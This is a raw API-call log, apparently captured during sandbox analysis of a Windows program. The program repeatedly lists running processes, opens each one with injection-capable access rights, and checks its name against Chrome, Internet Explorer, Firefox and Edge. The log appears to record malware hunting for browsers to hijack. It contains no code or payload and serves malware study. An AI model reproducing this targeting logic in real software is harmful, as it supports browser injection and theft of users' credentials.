	[0213.798] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0213.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x41d4
	[0213.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.799] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0213.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.799] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.800] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0213.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.800] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.800] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x41d8
	[0213.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.801] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.801] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.801] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.802] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.802] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x41dc
	[0213.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.803] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.804] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.804] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.804] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.805] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0213.805] CloseHandle (hObject=0x188) returned 1
	[0213.805] Sleep (dwMilliseconds=0x64) 
	[0213.927] GetCurrentProcessId () returned 0x110
	[0213.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0213.929] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0213.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0213.931] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0213.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x41e0
	[0213.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.932] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.932] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.932] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.933] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.933] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x41e4
	[0213.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.934] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.934] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.935] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.935] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.935] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0213.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x41e8
	[0213.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.936] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0213.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.937] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.937] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0213.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.938] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.938] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x41ec
	[0213.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.939] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.939] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.939] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.940] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0213.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x41f0
	[0213.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.941] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0213.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.941] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.941] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0213.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.942] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0213.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x41f4
	[0213.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.943] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0213.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.944] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.944] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0213.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.945] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.945] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0213.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x41f8
	[0213.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.946] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0213.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.947] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.947] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0213.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.948] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0213.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x41fc
	[0213.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.949] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.949] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.950] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.950] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.950] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4200
	[0213.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.951] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.952] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.952] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.952] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4204
	[0213.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.953] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.954] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.954] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.954] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.955] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.955] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4208
	[0213.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.955] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.956] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.956] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.956] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.957] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x420c
	[0213.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.957] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.958] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.958] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.958] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.959] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4210
	[0213.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.960] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.960] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.960] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.961] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.961] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4214
	[0213.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.962] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.962] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.962] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.963] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.963] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4218
	[0213.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.964] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.964] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.964] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.965] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.965] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0213.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x421c
	[0213.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.966] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0213.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.966] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.966] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0213.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.967] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.967] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.968] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4220
	[0213.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.968] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.968] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.969] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.969] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.969] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0213.970] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4224
	[0213.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.970] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.971] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.971] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.972] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4228
	[0213.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.973] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.973] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.974] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.974] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x422c
	[0213.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.975] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.975] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.976] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.976] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0213.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4230
	[0213.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.977] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0213.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.977] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
